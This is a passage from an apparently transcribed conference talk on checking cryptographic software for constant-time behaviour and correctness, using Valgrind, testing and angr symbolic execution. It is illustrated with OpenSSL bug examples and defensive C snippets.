libraries which say they have some constant-time code. It is not pervasive by any means, but some people say they are trying to do things in constant time and avoid these attacks. Is that true? People make claims about crypto all the time, like RC4, which was used until pretty recently. Sorry? "That's bad crypto." It is bad crypto, but it was introduced with the claim that it is great crypto: RC4 is the crypto you want to use, and somebody gives you RC4 software; originally it was proprietary, but eventually it leaked, and then everybody had RC4 software, and this software, yeah, it is a strong cipher and it is constant time. Well, how do we check these things?
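Before getting to how such claims are checked, here is a sketch of the ladder data flow just described, with modular exponentiation standing in for the curve operations (squaring playing the role of doubling, multiplication the role of addition); real X25519 code applies this pattern to curve points with the dedicated Montgomery ladder formulas, so this is only an illustration of the structure, and the function names are made up:

#include <stdint.h>

static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t n) {
    return (uint64_t)(((__uint128_t)a * b) % n);
}

/* Constant-time conditional swap driven by a 0/1 flag. */
static void ct_cswap(uint64_t *a, uint64_t *b, uint64_t swap) {
    uint64_t mask = (uint64_t)0 - swap;
    uint64_t t = mask & (*a ^ *b);
    *a ^= t;
    *b ^= t;
}

/* Ladder: maintains r1 = r0 * g; returns g^d mod n after nbits steps. */
static uint64_t ladder_exp(uint64_t g, uint64_t d, uint64_t n, int nbits) {
    uint64_t r0 = 1, r1 = g;
    for (int i = nbits - 1; i >= 0; i--) {
        uint64_t bit = (d >> i) & 1;
        ct_cswap(&r0, &r1, bit);
        r1 = mulmod(r0, r1, n);                   /* one "addition" per bit */
        r0 = mulmod(r0, r0, n);                   /* one "doubling" per bit */
        ct_cswap(&r0, &r1, bit);
    }
    return r0;
}

Each iteration does exactly one "doubling" and one "addition", and the only key-dependent operation is the constant-time conditional swap.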
Well, the strength of the cipher is outside the scope of this talk; it is not a good cipher, do not use RC4. But how about the constant-time property of RC4 or of something else? This example actually uses RC4. The code is maybe a little weird, so let me first explain what it does and then what Valgrind does with it. It is sort of the start of code to encrypt using RC4: there is a key, some space allocated for the key, 32 bytes (you can try other key lengths, but 32 is a reasonable one), the program aborts if the malloc failed, and at the end it properly frees the key. It never initializes the key. So maybe this is a work-in-progress program, but okay: there is some space for a key, and then it expands the key; RC4 has a key-expansion process into what OpenSSL calls the RC4_KEY structure. And then there is supposed to be some encryption after this, which also has not happened yet, but the program is still something you can compile, and the compiler, with normal optimization options and without link-time optimization and so on, will not realize that this program does nothing: maybe RC4_set_key is, I don't know, crashing your system or producing some output. So the compiler will emit calls to malloc and RC4_set_key, and then you can run this program under Valgrind. I am sure lots of people here have used Valgrind or AddressSanitizer for checking for memory problems. Valgrind has the advantage that it works on binaries, and maybe some of you were in room C for the previous talk about fuzzing: it is really helpful to have tools that work on binaries, so that you do not have to get into the whole compilation process. You just take the code that you are going to run, like RC4_set_key from OpenSSL, without recompiling or touching OpenSSL at all, and run Valgrind on the compiled code. It will run this program, allocate space for a key, call RC4_set_key, and interpret every machine instruction; while doing that it keeps track of which memory you are actually allowed to talk to. For instance, the malloc sets aside this amount of space on the heap, and you are not supposed to go before or after it; Valgrind tries to keep track of what your pointers point to, and when you read and write data it will tell you if you are not allowed to do that. One of the things it checks is this: suppose you have some uninitialized data and you use it as a pointer, or as a branch condition, or you try to do an if or an x[i] where i is not initialized; then Valgrind will give you an error. And that actually happens in this code: the malloc'd array is uninitialized, and Valgrind will track all of the uninitialized data, like taint tracking, through all of the computations inside RC4_set_key, and then it will complain. You get an error message that looks like the usual kind of Valgrind error, for those who have used the tool, and it says there is a use of an uninitialised value, and not just any use: this particular message means you have done an array access x[i] where i is uninitialized.
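For reference, a reconstruction of the little test program just described; the variable names are guesses, but the RC4_set_key call and the header are the real OpenSSL API:

/* Build and run, e.g.:  cc rc4test.c -lcrypto && valgrind ./a.out
 * (deprecation warnings from newer OpenSSL versions can be ignored here). */
#include <stdlib.h>
#include <openssl/rc4.h>

int main(void) {
    unsigned char *key = malloc(32);      /* 32-byte key buffer, never written to */
    if (!key) abort();

    RC4_KEY expanded;
    RC4_set_key(&expanded, 32, key);      /* key expansion on "undefined" data */

    free(key);
    return 0;
}

Running the binary under Valgrind produces exactly the reports discussed next: Memcheck flags every branch and every table index inside RC4_set_key that is derived from the uninitialized key bytes.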
It makes sense that Valgrind refuses to continue past that x[i] and just guess: it is trying to figure out whether you are accessing some wrong spot in memory, and if i is uninitialized it simply says that is an error, you are not supposed to do that. Similarly, if you do an if based on i where i is uninitialized, Valgrind says no, you are not allowed to do that, and produces another complaint, not exactly the same message, about a branch based on uninitialized data. And hey, that is exactly what we want in order to check whether this RC4_set_key is constant-time code: is any of the key information being used for a branch, is anything derived from the key being used for a branch, or is it being used for an x[i], which could run into one of those cache-timing attacks? If Valgrind reports a problem, you investigate and you fix it, by throwing away RC4 or whatever you have to do to fix your software; and if Valgrind reports no problem, then hey, cool, all done. So it is a happy talk after all: we have constant-time exponentiation and scalar multiplication, we have constant-time RC4, under a few conditions. One is that your arithmetic holds up: in the end you have to implement the computations on the elliptic curve, or the arithmetic modulo your RSA modulus, and you have to do that long-integer arithmetic in constant time, but you can check this in the same way, since Valgrind follows every single machine instruction. Valgrind: awesome tool. There is another condition, namely that the processor does not screw you over. The processor says, okay, I will do a multiplication, I will do a division, I will do an addition; if the processor does it in a single clock cycle, then that is probably fine, and you check the reference manual for how long a multiplication or an addition takes and when you have access to the result. But how about other processors? I had a poor student look at the Cortex-M3, a low-end ARM processor; we asked him to do a nice implementation of elliptic-curve cryptography on it. If you look at the multiplication that takes two 32-bit words and produces a 64-bit output, twice as long, as a multiplication should, and you look at the cycle counts, you see "3 to 7 cycles, footnote c". Footnote c tells you that the instruction may terminate early depending on the size of the source values, so it can take anything up to seven cycles in the worst case. A student with lots of time: it is only two 32-bit inputs, you cannot test all of them, but you can have a student test a whole bunch, and he came up with a flow chart. This Cortex-M3 takes every value between three and seven cycles, except four, depending on which of those internal branches are taken: whether one operand is special, whether both are, whether one is zero. In that situation Valgrind will not help you, and the fix in that situation is basically to buy a different processor.
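Where Valgrind does apply, the uninitialized-malloc trick generalizes: you can mark real secret data as "undefined" by hand, the approach known from tools like ctgrind and the TIMECOP checks in SUPERCOP. The two macros below are real Memcheck client requests from valgrind/memcheck.h; check_secret_op() is a hypothetical stand-in for whatever routine is being audited:

#include <string.h>
#include <valgrind/memcheck.h>

extern void check_secret_op(const unsigned char *key, size_t len);  /* hypothetical routine under audit */

void audit(const unsigned char *real_key, size_t len) {
    unsigned char key[64];
    if (len > sizeof key) return;         /* sketch assumes keys of at most 64 bytes */
    memcpy(key, real_key, len);

    /* Tell Memcheck: treat these bytes as undefined, so any branch or
     * memory index derived from them is reported, exactly as for
     * genuinely uninitialized data. */
    VALGRIND_MAKE_MEM_UNDEFINED(key, len);

    check_secret_op(key, len);

    /* Mark the buffer defined again before doing anything that is
     * legitimately allowed to depend on it (e.g. printing a test vector). */
    VALGRIND_MAKE_MEM_DEFINED(key, len);
}

Run the binary under valgrind as before; secret-dependent branches and lookups show up as the same "use of uninitialised value" reports.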
Yeah, this is what happens when we decide to do a constructive talk, 80 percent positive, this is going to be about defense, and then we talk it through and realize it is all kind of broken, which is sad. It is actually even worse: it is not just that the tools do not do what we want for checking that things are constant time, they also do not check that the code is correct. We have spent half the talk on timing attacks, and there are all these timing vulnerabilities appearing in the news, and lots more that do not appear in the news, and then on top of that there are more CVEs where it is not the timing that goes wrong. Let me explain. CRYPTO_memcmp is a function inside OpenSSL which exists because it would be really embarrassing if OpenSSL had byte-at-a-time password checking, or authenticator checking, inside its code; so CRYPTO_memcmp has been there forever, and it does a supposedly constant-time comparison of two byte strings. It is not that OpenSSL does everything in constant time, but it does do this in constant time. And the PA-RISC implementation, because of an implementation bug, compares only the least significant bit of each byte. This is from May 2016: somebody thought that they knew what PA-RISC processors are, and that it is a good idea for OpenSSL to have assembly code for comparing two byte arrays on PA-RISC. I do not know how many people have ever used a PA-RISC processor; can I see hands? Okay, I see at least ten hands raised, I am impressed. It is not the world's most popular processor, but it exists, you can write assembly code for it, and maybe you can even find machines to run that code on. It is actually not crazy that OpenSSL has assembly code for things, because compilers screw things up pretty frequently; on the other hand, as this particular implementation illustrates, humans also screw things up pretty frequently. So what does this bug do, what is the impact? The advisory says it "allows an attacker to forge messages that would be considered as authenticated in an amount of tries lower than guaranteed by the security claims of the scheme". Okay, let us figure out what that means. You have a message, and it typically has a 16-byte, 128-bit authenticator at the end, and CRYPTO_memcmp is used to check it: you recompute the authenticator with whatever mathematical function and check, with CRYPTO_memcmp, whether the result equals what came in from the network; if somebody has modified the message then hopefully they cannot compute that same 128-bit result. Now try this with the PA-RISC CRYPTO_memcmp on your PA-RISC server: comparing the computed 128-bit authenticator to the correct 128-bit authenticator only compares the bottom bit of each of the 16 bytes, so it compares 16 bits, which means that instead of a 2^-128 chance of forgery it is a 2^-16 chance. The attacker just tries 2^16 messages and one of the forgeries is going to work. "Lower", the advisory says; yes, 2^16 is indeed a lower security level than 2^128. This is classic British understatement: your security level is perhaps not quite what you wanted.
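For reference, this is the comparison CRYPTO_memcmp is supposed to implement, as a portable C sketch; the comment about the bug paraphrases the advisory's "only compares the least significant bit of each byte":

#include <stddef.h>

/* Constant-time comparison: OR together the XOR of every byte pair, so
 * the timing never depends on where the first difference is.  The buggy
 * PA-RISC assembly effectively behaved like `d |= (a[i] ^ b[i]) & 1`,
 * checking only 16 bits of a 16-byte tag. */
int ct_memcmp(const void *av, const void *bv, size_t len) {
    const unsigned char *a = av, *b = bv;
    unsigned char d = 0;
    for (size_t i = 0; i < len; i++)
        d |= a[i] ^ b[i];                 /* no early exit, no data-dependent branch */
    return d != 0;                        /* 0 = equal, nonzero = different */
}

With the full XOR, a forger still has to guess all 128 bits of the tag; checking only bit 0 of each byte reduces that to 16 bits, hence the 2^-16 forgery chance discussed above.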
Okay, PA-RISC: let us forget about PA-RISC, just like the whole computer industry has, and focus on Intel. I mean, PA-RISC was a nice idea at the time; Sun used to have these SPARC processors, Fujitsu still makes SPARC processors, and I do not think anybody is trying to preserve PA-RISC, but people keep having these ideas of making new instruction sets, and at some point Intel made a new instruction set and it got really popular and they kept extending it and kept selling nice fast processors. So here is something using AVX2, the 256-bit vector instruction set on current Intel and AMD processors: an implementation of 1024-bit modular exponentiation in OpenSSL. The code is from July 2013 and was discovered in 2017, announced in CVE-2017-3738, to have an overflow bug. What are the consequences of this bug? Let me guess: a lower security level. Well, they say "attacks against DH1024 are considered just feasible". Yes, you should not be using DH-1024 in the first place, but if you are, and the attacks are becoming just feasible, does that mean 2^16 computations, does it mean a day on your laptop, does it mean a year on a cluster? I want to know how hard the attack is, and this is not really answered. And there is more that is not really answered in the advisory, because they say you are probably not using DH-1024, but maybe back when this was announced you were still using RSA-1024, or maybe DSA-1024, and those would use the same subroutine; and the advisory says that attacks against RSA-1024 as a result of this bug "would be very difficult to perform and are not believed likely". What has happened here? There is the original cryptosystem, and then there is a bug which basically makes a new cryptosystem, one doing a wrong computation; and, well, this notion of "wrong", it is just a different cryptosystem, this slightly different RSA-1024, we should not criticize it, it is just, you know, differently abled RSA-1024, and maybe it is secure, and they say it is going to be fine. But has anybody really looked at this? Normally, if we have a new cryptosystem, we want it to go through a whole lot of review, because there are lots of things you can do wrong and it is really important to get these things right. Lots of people were using RSA-1024; of course you should not, you should use something much bigger or switch to elliptic curves, but if people were using RSA-1024 and these wrong computations were happening, what are the consequences? Where are the papers analyzing this widely deployed cryptosystem? It is like saying: we have deployed this cryptosystem, we have looked at it ourselves and decided attacks are not likely, just believe us. People say this sort of thing all the time: if you cannot break it, it is going to be fine; yeah, okay, you are right, everything is fine. And similarly, a few weeks ago OpenSSL put out another advisory for another bug like this, CVE-2019-1551. It is not that we knew this was coming and figured we would give a talk about bugs in crypto software just to make fun of it; these things happen so often, there are so many of these bugs, and we do not know what the consequences of all these bugs are; they just keep happening. Here is an example of just one piece of the patch for the 2017 bug: the code before already has a comment saying "correct", and the patch adds some more lines saying "correct". Oh well, okay, that is clear enough, next slide. How about post-quantum crypto? You have got these top hundreds of cryptographers around the world fighting against the threat of quantum computers and putting together the next generation of cryptographic software.
Software protected against quantum threats, and that is going to be carefully evaluated, right, everything is going to be just fine? Well, no. Take Falcon, for example, one of the round-two signature candidates in the NIST post-quantum cryptography competition, well, standardization project. There was an announcement in September 2019, quoting the author of the software, saying that there are some bugs, and the consequences are that the signatures leak information on the private key, and the bugs also make the software look faster than correct software would have been. Interestingly, all of the latest Falcon round-two implementations that were released had the same bug; they all had the same test vectors, you could cross-check them, and they were all doing the same leaking, wrong, oops, sorry, different cryptographic computation, which presumably has lower security. Are we going to spend a lot of time figuring out how much lower? The author also commented that the fact that these bugs existed shows that the traditional development methodology, being super careful, has failed. So what can we take away from this? Mathematical complications in cryptography: think of elliptic curves, as I mentioned. If you have these special points that need extra treatment, you have to watch out: are you even allowed to add them, can you even represent them in your software? These do make your software more complex. Something we saw with the Falcon implementation is that it is a new system and has not been studied for long, while for something that has been studied for a long time, like RSA and ECC, we still see issues. Things get worse if you add side-channel countermeasures. As one example, you saw how I was trying to avoid leaking whether a bit is one or zero by introducing arithmetic; if you have to review that code, it is more complicated than code that just says, if the bit is one do this, if the bit is zero do nothing. So such countermeasures add complexity as well. The CRYPTO_memcmp comparison bug came about for the same reason: people were trying to make the comparison not leak information through timing, so they made a new implementation and introduced new bugs. And with post-quantum cryptography we are getting a whole bunch of systems, like Falcon, which have been studied less, where we have less experience in how to implement them securely, where we do not even know all the pitfalls; that adds to the complexity of what reviewers have to watch out for. So it is a problem to review cryptography. Another problem with crypto is this drive for speed: crypto runs through large volumes of data, so we have very small code that we run many, many, many times, and we optimize the hell out of it. Doing one squaring and one multiplication for each and every bit really is annoying, so we squeeze a bit here and squeeze a bit there, and that makes the code more error-prone as well. And you get a huge amplification in the number of implementations: you will have an implementation for your x86 architecture, some with AVX2 instructions, some without, and you might go all the way down to PA-RISC special instructions; for each CPU there is a dedicated implementation, not just the reference code. Take, for instance, Keccak, the winner of the SHA-3 competition.
Keccak is a relatively new hash function that has only been around for, well, newer platforms, but the team still has more than 20 implementations for different platforms in their library. Or take Google: in order to get fast disk encryption on lower-end smartphones, where a cheap phone might have just a Cortex-A7 rather than a newer core with AES instructions, they said, okay, we would like to add full-disk encryption, but what we have sitting around is too slow; doing AES without the hardware support would drain too much battery. So they even went down the road of taking a cipher specified by the NSA, the Speck cipher, and putting it in there, because it seemed to be the only thing satisfying the speed requirements. They did switch after some public outcry, and in particular Jason Donenfeld did a lot of work to make them switch to something better, and they then did yet another implementation, yet another code base, of a recently designed combination which they call Adiantum, built on XChaCha. So there is a lot of code to review and a lot of places for errors to hide. How do we deal with this? Well, if the problem is all these complicated implementations of all this complicated math, maybe math is the solution, so here is some help: one plus one is two. That is the comment at the bottom here, from a book from 1910, under a proposition which is proven in, let us say, very comprehensible language: it will follow, once we have defined addition, that one plus one equals two. This is on page 379 of Principia Mathematica by Whitehead and Russell. I do not know whether they do one plus two equals three, that sounds more complicated; but somehow they found it important to prove things in this incredible detail, in some sort of machine language for proofs, and then people complain that their machine language has bugs. People have kept working on this over the last more than 100 years, and there are fans of the approach who say that yes, you should go through this kind of pain, you should spend your 379 pages proving that your code works. You take your software and you write down a formal proof in incredible detail, not just to convince yourself and some friends, but to convince a computer that does automated checking of your proofs, and that computer program says: yes, you have a correct proof that your software computes the right thing. And what is the right thing? Well, you have to carefully define that: specify the language your software is written in, specify what the input-output relationship is supposed to be, and then prove that your software has that input-output relationship, assuming, of course, that you got all of that right. If the proof then checks, yes, everything should be fine. These tools work, but, just to give some context, mathematicians who do proofs all the time do not like these tools; occasionally they will use them, but it is really not a popular set of tools, because they are such a pain to use. Nevertheless, they have enough fans that some amazing results have happened. EverCrypt: this is a paper with something like 15 authors, and they have a crypto library with implementations of all the crypto you need, as long as you do not care about any of those NIST curves, or post-quantum crypto, or... well, here is the list of what they do support.
It has got some public-key stuff and some signatures and some symmetric functions; arguably enough to do, you know, HTTPS with these primitives, and that is what EverCrypt supports. In the case of AES you need your CPU to have AES instructions, so maybe that is not so portable, but okay, it does support some other ciphers on any platform, and you can use it. And there are proofs: people have actually done it, the EverCrypt papers report how they took some standard proof tools and formally went through this software, showing that it does exactly the right calculation, which is, okay, that is a serious guarantee. The good thing is that this code really has the maximum assurance of any code we have seen for cryptography: if you use EverCrypt, it will compute the right output for every input, exactly what is specified, assuming the specification is correct, assuming the processor is correct, assuming the compiler is correct, because a lot of it is written in C, so you need your C compiler to be correct. But okay, you can deal with those problems separately, how to verify CPUs, how to verify compilers, and so on, and have people review the cryptographic specifications. So it actually feels like something serious is being accomplished here. The only problem is that it is such a pain to do: for every implementation you have to do quite a bit more work, and people are getting lots of practice and building better tools, but it is still a ton of work to produce these formally verified pieces of cryptographic software. An example of how hard it is, is illustrated by that very list of what EverCrypt supports: they have implementations of those functions, they even have, for Intel chips, some fast implementations of some of them, but if you want something that is fast on your smartphone or smartwatch, where performance is maybe more of an issue than on your big laptop, then no, EverCrypt does not give you fast implementations. It does have something that works, but it is going to be several times slower, nowhere near what Tanja was describing about squeezing out the last bit of speed; it is really far behind the state of the art in speed, because it takes a lot of human time to take a new implementation and prove something about it. So what do you do when you do not have proofs? Well, of course, you test stuff. We could spend the whole hour on how cool testing is; actually, let me see a show of hands: how many people here have ever had the feeling, I wish I had done some more tests of this code, you know, for this bug that I had? Let me see a show of hands... I see pretty much everybody in the audience raising their hands. Okay, and how many people have ever had the feeling, oh, I did too many tests? I see... okay, maybe about 20 people, out of, I don't know, a thousand-something; sorry. Who is in both camps, who thought they tested too much and too little? Yeah, yeah. Of course testing is fantastic, you should test everything, and if you find that something is hard to test, it is probably because you screwed up the factoring of the software you are trying to test, the pieces are too entangled, you should be modularizing more so that you have a piece you can test. If you do test-driven development, then you will basically have working code all the time, and that is a really nice feeling, except there is a little problem, which I will get to.
But something like the CRYPTO_memcmp bug in OpenSSL for PA-RISC, where only the bottom bit of each byte was compared: that is something which gives the wrong result for one out of 2^16 random inputs, so if you try 2^16, or millions or billions, of tests, which does not take that long, you are going to catch it. Or, instead of purely random tests, the whole fuzzing philosophy says to choose what you test more cleverly: you try a string, and then you try flipping a few bits here and there and check whether the comparison still gives the right result, and that finds very quickly that this CRYPTO_memcmp does not work. And these are not just things you could think of doing retroactively: this was actually implemented in the SUPERCOP crypto test framework before the bug was introduced into OpenSSL; it is just that this crypto code was not plugged into that framework, so the bug was not caught, but we almost could have caught it if the testing effort had been organized a bit better. In general, if you see a bug, then at least retroactively you should ask yourself, all right, how can I write tests that would catch that bug? Usually there is a pretty easy answer, and then you add that to your regression test suite and make sure it never happens again, and if these regression test suites are shared widely enough, it never happens to anybody again. That is really effective, except that the main thing that goes wrong with testing is that you are not testing all of the possible inputs, and so we have seen, time and time again, millions of security holes where the attacker finds some input that nobody thought of testing. It was not caught by random testing, it was not even caught by fuzzing; it is just some obscure kind of input where the attacker says, ha, if I try an input of exactly that length, after setting up the following condition, then the following weird thing happens, and then I can take advantage of it like this. There is some input that behaves in the wrong way which you are never going to find through testing, or even with the most advanced fuzzing that we have. How do you deal with this? Well, it is not so easy, and it is something that definitely affects crypto. For instance, in November 2019 Nath and Sarkar reported that the fastest code out there for one of the standard elliptic curves, Curve448, a high-security modern elliptic curve, bigger than Curve25519, for if you want something at a higher security level, has a bug that randomly happens with probability one in 2^64. Well, that is a lot of tests; I am not going to do 2^64 tests. We have done some computations at that scale, but it takes a lot of effort to set up, and it is not something you do again and again for lots of different pieces of software. Could an attacker find those inputs? In the paper announcing this, Nath and Sarkar say, all right, here are some inputs which make this operation fail, inside a subroutine; that does not mean the attacker can find inputs to the whole crypto operation that make it fail. Should there be more analysis of how devastating this bug is, or should we just get rid of the bug in the first place? What they say is: for certain kinds of inputs the code gives wrong results, but with very low probability, so no, tests are not going to find this.
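For the bugs that testing can catch, like the CRYPTO_memcmp one above, the harness is cheap to write. A sketch of the random-plus-bit-flip style of test just described; candidate_memcmp() is a hypothetical name for whatever implementation is being audited:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern int candidate_memcmp(const void *a, const void *b, size_t len);  /* implementation under test */

static void random_bytes(unsigned char *p, size_t len) {
    for (size_t i = 0; i < len; i++) p[i] = (unsigned char)rand();
}

int main(void) {
    enum { LEN = 16, TRIALS = 1000000 };
    unsigned char a[LEN], b[LEN];

    for (long t = 0; t < TRIALS; t++) {
        random_bytes(a, LEN);
        memcpy(b, a, LEN);                           /* start from equal inputs */
        if (t & 1)
            b[rand() % LEN] ^= 1u << (rand() % 8);   /* flip exactly one bit */
        else if (t & 2)
            random_bytes(b, LEN);                    /* fully random second input */

        int want = (memcmp(a, b, LEN) != 0);         /* reference semantics */
        int got  = (candidate_memcmp(a, b, LEN) != 0);
        if (want != got) {
            printf("mismatch at trial %ld\n", t);
            return 1;
        }
    }
    printf("no mismatches in %d trials\n", TRIALS);
    return 0;
}

Against an implementation that only checks the least significant bit of each byte, the single-bit-flip cases fail almost immediately, since seven out of eight flipped bits are invisible to it.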
And so Nath and Sarkar say you have to prove correctness, and this is the dichotomy people often present: either you do some tests, which will find the common bugs, or you do proofs, which is a lot more work, really painful, but will find all of the bugs. There is another approach, which is symbolic testing. Take the memory-comparison example again, not for PA-RISC this time: on the left here is CRYPTO_memcmp for normal Intel chips, x86-64, inside OpenSSL, and let us not think of this as testing but as code auditing. You can read through it; well, maybe you cannot, because the font is too small, or maybe you are not fluent in assembly, but you read through it and eventually you say: here is the computation it does for some particular input size. Take, for example, 3-byte inputs; of course you have to do this for every length you care about, 16 bytes being very common, so for each length you figure out what this code does. For 3-byte inputs it takes x0, x1, x2 and compares them to y0, y1, y2, and how does it do that comparison in constant time? It XORs x0 with y0, x1 with y1, x2 with y2, so now it has three byte-sized XOR results, and it ORs them together bitwise. That gives a number between 0 and 255; if the arrays match you get 0, and if there is any difference, the XORs are between 1 and 255 and the bitwise OR is also between 1 and 255. Then it converts that to a 64-bit integer, putting 56 zero bits on top, negates that integer, shifts right, and if you think about it for a moment you see that you always get 1 if there is any difference in the inputs. That is the logic you can go through as a code reviewer to say, yes, this works correctly: you start from the assembly, you figure out what it means for each size you care about, and that gives you this computation graph, a DAG, a directed acyclic graph, showing how the inputs produce the output through a series of computations; then you analyze the graph, conclude that it works, and you do it again for each length. All right: there are tools which make this really, really easy to do. Let me highlight angr; it is not the only tool out there, but it has the big advantage of working on binaries. It starts from libVEX, the instruction lifter inside Valgrind, and builds a lot of extra cool stuff on top of that. What angr does is that whole red arrow from the previous slide, automatically: it will take your binary, run through the instructions, and tell you, all right, here is what that did to your input arrays x and y, and here is how the output is a graph of those inputs. This makes your code review easy, because you do not have to think about memory accesses and pointers, and you do not have to deal with the complications of the assembly instruction set: the output of angr is a much simpler instruction set, there are no jumps, it is this completely unrolled DAG that you get as output. There is one constraint: if angr reaches a branch based on one of the inputs x and y, it is going to say, oh, there are two possibilities, maybe you take the branch and maybe you do not, and if you do an array access based on any of those variable inputs, it will similarly split and say, well, there are all these possibilities for which array index you are accessing.
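Written out as plain C, the 3-byte comparison that the reviewer checks, i.e. the DAG just described, looks like this (the function name is invented for illustration):

#include <stdint.h>

/* XOR each byte pair, OR the results, zero-extend to 64 bits, negate,
 * shift right by 63: the result is 0 exactly when the inputs match and
 * 1 if any byte differs. */
int memcmp3_dag(const unsigned char x[3], const unsigned char y[3]) {
    uint64_t t = (uint64_t)((x[0] ^ y[0]) | (x[1] ^ y[1]) | (x[2] ^ y[2]));
    return (int)((-t) >> 63);
}

Checking that this expression reports 0 for equal inputs and 1 otherwise is the whole correctness argument for this length, which is why the DAG view makes the review so much easier.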
But hey, we were getting rid of exactly those secret-dependent branches and lookups anyway; that was the first part of the talk: we do not want these variable-time operations, we want straight-line computations, maybe with some loops, but loops based on public data, not on the secrets we are working with. So we get rid of this blow-up in the crypto code anyway, we want to do that to protect against timing attacks, and that means angr runs really fast and gives you the unrolled code, and then it can even sometimes check the correctness of that code for you: for instance, for this CRYPTO_memcmp on 3-byte inputs it will tell you, yes, this works. Now we have only nine minutes left, so maybe I will just very quickly show you what some of the code looks like and skip a bunch of details. This is a simple call to CRYPTO_memcmp on some arrays of size n; you define n to be 3 or 16 or whichever length you care about, and you do this again and again. It takes x and y, those arrays, compares them and puts the result into z. The compiler will not remove this code under normal optimizations, because who knows what happens after main: maybe the exit path is going to look at the z value, it is a global variable, maybe something is going to be done with it; so CRYPTO_memcmp really will be called. And then angr: okay, there is some setup of grabbing the binary and telling angr that memory is all filled with zeros to begin with, and then you tell angr, all right, you are going to run this code, but instead of zeros coming in for x and y, let us replace those spots in memory with some variables. Say that x[0] in memory is going to be the symbolic variable x0, where we do not know what it is, it could be anything from 0 through 255, and the same for x1, x2, y0 and so on. Then you run the program and you extract the z values out of all the possible universes you end up with, and all the magic happens in the last lines here: after angr has run through the code, you can just ask it whether any of the following classes of bugs can possibly happen. There are automated tools called SMT solvers which can sometimes answer this question; they might run for a very, very long time, but for this example it runs in under a minute and tells you: yes, the code always works. All right, last slide: what is missing, what are the people trying this approach working on? Well, if you have constant-time code you can always do this angr translation; another tool which will do this for you, which I have not used personally, is Manticore, which supposedly can do the same thing from binaries and comes with a lot of the same kinds of analyses. I have worked with angr, angr works just fine, and it also has this cool GUI called angr management. So angr, yeah, it will always convert your code into this DAG, that is the red arrow there, it will always give you the result of that, and all of the interesting problems start at that point: if the SMT solvers are not smart enough to see that the resulting code works, then you have to build some new tools which will look at, for instance, one DAG for your reference code, which you have reviewed and which you are sure works, and another DAG for your complicated, fancy, vectorized assembly implementation, and then you want to see whether those are doing the same computation, so you have to match up those DAGs, and people will give arguments for why this is the same, and the whole game here is to build tools that do this matching.
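For completeness, the little harness described above, the binary that angr is pointed at, looks roughly like this; N, the array names and the use of a global z follow the description in the talk, and the OpenSSL header is the real location of CRYPTO_memcmp:

#include <openssl/crypto.h>

#define N 3                     /* try 3, 16, ... one run per length you care about */

unsigned char x[N], y[N];       /* zero-initialized globals; angr makes them symbolic */
int z;                          /* global result keeps the call from being optimized away */

int main(void) {
    z = CRYPTO_memcmp(x, y, N);
    return 0;
}

The angr script then replaces the bytes of x and y with symbolic values, executes to the end of main, and asks an SMT solver whether z can ever disagree with the intended comparison.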
This is maybe... I will skip the sorting example, aside from giving the URL; it is just one example of doing this for sorting code, where right now the fastest Intel-chip sorting code for integer arrays in memory is some new sorting code which is constant time, about three times faster than Intel's Integrated Performance Primitives library, where they were trying to optimize sorting, and it is verified to produce the right results with tools that look at the DAGs coming out of angr and say, yes, that is a correct sorting program. If you are interested in doing this sort of thing, then take some crypto code where nobody has claimed it is verified, which is most crypto code, just take random examples, and then first check that it is constant time; if it is not, forget it, it is going to be vulnerable to timing attacks, throw it away. But if it is constant time, then use angr, get the DAG out of it, and then ask, okay, why does that match some other code which is supposed to do the same computation, say assembly versus some reference C code, and figure out how to match up those DAGs; usually a little bit of Python scripting will do that matching for you and tell you whether there are any problems. Sometimes you have to get into the details of how the crypto computations are done, but it is actually fun; that is the great thing about this approach compared to all the proving tools: symbolic testing, symbolic execution with angr, followed by matching up and analyzing the DAGs, is a fun way to analyze crypto software. At this point we will be happy to take questions, so thank you for your attention. Thank you. All right, we will do a very high-speed Q&A session, so please limit yourselves to questions, not comments; microphone number one please. Okay, I think it is a short question: is constant time really the only mitigation against timing attacks? Well, it is the mandatory part; you can do more, randomization and such things, but you want those not to depend on the secret data in a reproducible way. All right, mic number two please. Thanks for the talk; can any approaches from real-time operating systems be applied to cryptography? So, real time usually tries to make sure an operation finishes within at most a given amount of time, but what happens in fancier timing attacks, like hyperthreading attacks, is that the attacker has already extracted the secret data before you are even near the end of the computation, so it is a different game from the one real-time operating systems are playing; constant-time code can be useful in the real-time context, but it is a stronger constraint. Thanks. All right, back to one, please. Thanks for this amazing talk; I had a question regarding EverCrypt: you said the Curve25519 implementation was slower than the other available code, but to my knowledge the EverCrypt Curve25519 implementation is actually one of the fastest ones. On Intel, yes; on ARM it is slower. On Intel it is at the state of the art, but on ARM it is a few times slower. Okay, thanks. All right, Internet, go. Did the formal verification of EverCrypt also check for the absence of side channels, or just for functional correctness? It checked functional correctness and the absence of timing leaks; it is actually a constructive way of producing code which is constant time. All right, mic number seven.
You mentioned compiler bugs; how probable is it that a bug in angr covers up a bug in your code? It is definitely possible. The whole situation with testing is that you have your original code, where you may have made a mistake, and your test framework, where you may have made a mistake, and you are trying to have these be somewhat independent checks. Ultimately, of course, if everything is proven, you can imagine proving that angr works correctly, doing that once, and then it works for everything, but since it includes quite complicated machinery, all of Python, SMT solvers and so on, it will be some time before we are at that point. So yes, there is definitely a possibility of bugs in angr, it is something to worry about; as long as they are reasonably independent of the bugs you make in your crypto code, you are reducing the risk of errors. All right, mic, the signal angel please. Is there progress on formally proving true randomness? ... I think that is enough of an answer. Mic number one, please. What is the status of doing the arithmetic on pairing-friendly curves in constant time? That is again a little more complicated. If you just want the scalar multiplication: the TPM-Fail paper was also attacking the BN curves, so the same issue appeared there as well; implementations were not constant time even though they were inside TPM code which should have been validated. The pairing on top of it looks a little like an exponentiation, so the same tricks will work; at this moment the best available pairing code apparently was not constant time. All right, microphone number one, last question. What about superscalar processors; do they mess up your carefully crafted constant-time algorithms, or is that, at least from a certain distance, not relevant anymore? The way to think about it is that you want some isolated data which holds all your secrets, and nothing is ever copied out of that safe environment into the metadata which controls timing. With a superscalar processor you have multiple instructions happening in a cycle, but as long as the decision of which instructions are executed is not based on the data you are working with, you are good; that is where you have to be sure that the processor handles each instruction so that the time it takes depends only on metadata outside the secure environment. Okay, thank you for this great talk, and please thank our speakers again.
